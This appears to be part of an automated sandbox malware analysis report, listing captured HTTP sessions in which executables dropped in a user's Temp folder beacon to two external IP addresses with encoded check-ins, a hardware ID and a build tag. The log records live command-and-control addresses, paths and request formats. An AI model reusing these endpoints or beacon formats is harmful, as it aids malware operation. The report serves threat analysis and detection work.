                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604260921 CET1236INData Raw: fa ab 85 78 7d b5 c6 5c 45 ef 30 3e fb 4c 11 5c 3d 7a 2d 57 89 be fc 77 f5 48 d9 6d fb f6 84 6d e2 47 84 e2 14 40 2a 92 05 3e 8f e6 bb bc 0e 5e 3d 40 40 98 25 52 e1 73 ce 47 6e a5 8d 6c 22 de fc 36 8b cd a4 43 cf ac 9d 40 19 0e 87 06 c6 65 7f c7
                                                                                                                                                                                                                                                                                        Data Ascii: x}\E0>L\=z-WwHmmG@*>^=@@%RsGnl"6C@e5&s.[,N8MO~L"uaBe(dno\qsquos.G7L.eFUBjw-=HjwW@*z|]9O,7m7)Tmhc<>u6
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604281902 CET1236INData Raw: ed 7d 19 d3 24 7e 1a 91 69 bf 5c cf ff f4 18 6e b0 a6 aa 5d 81 36 ad d2 49 df 24 b5 ad cf 12 06 05 02 85 98 78 6e 81 16 ae 40 61 4e 39 72 8e d1 a8 85 c7 45 fe 32 2e 65 75 ba 31 ab 4f 36 21 69 79 56 13 6e 71 5a c7 9c 29 32 3f 76 fb 6c c9 64 e1 b6
                                                                                                                                                                                                                                                                                        Data Ascii: }$~i\n]6I$xn@aN9rE2.eu1O6!iyVnqZ)2?vld>r/zVdOIBXdQH()j9o.[)d/v7IX/d7%!~.Nce-fIDkyxD6kE@8WcL,OuFc-?%!c0]^IJRffI\
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.609121084 CET1236INData Raw: a9 53 d1 ba 18 76 13 62 f5 5a f5 f1 fa 6c 49 75 bd 42 55 9f 2f a6 51 05 ed 72 79 78 95 b2 12 b8 2a 4a 3f 65 11 64 0d 12 75 72 8f 8a 41 31 a8 f8 f4 b2 21 72 1f b6 25 87 6f e0 38 d2 fa 6e 2a 2e 86 3c 1e 68 39 51 19 7a 7d 40 1a be 88 57 04 6a 15 ec
                                                                                                                                                                                                                                                                                        Data Ascii: SvbZlIuBU/Qryx*J?edurA1!r%o8n*.<h9Qz}@Wj)6b0md}A@N-q16"Dvm@%f{5,sxd.*^Wc6>'pt->-{H"qwy,9>6']dThQO|E&ZI.PO>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        20192.168.2.450064185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:40.796250105 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:41.437753916 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:41 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        21192.168.2.450068185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:43.111301899 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:43.750272036 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:43 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        22192.168.2.450072185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:45.400486946 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:46.048496962 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:45 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        23192.168.2.450074185.215.113.206807024C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:45.509895086 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:46.147649050 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:46 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:46.150491953 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECG
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="build"mars------GIJDAFBKFIECBGCAKECG--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:46.352534056 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:46 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        24192.168.2.450079185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:47.680164099 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:48.320310116 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:48 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        25192.168.2.450084185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:49.840327978 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:50.488564014 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:50 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        26192.168.2.450090185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:52.254128933 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:52.895555973 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:52 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        27192.168.2.450092185.215.113.206803604C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:52.967978001 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:53.610080957 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:53 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:53.618623018 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build"mars------FCFBFHIEBKJKFHIEBFBA--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:53.850471973 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:53 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        28192.168.2.450096185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:54.407517910 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:55.078624010 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:54 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        29192.168.2.450102185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:56.702364922 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:57.336441040 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        30192.168.2.450107185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:58.961266994 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:59.602941036 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        31192.168.2.450113185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:01.231920958 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:01.896867037 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:38:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        32192.168.2.450118185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:03.422384977 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
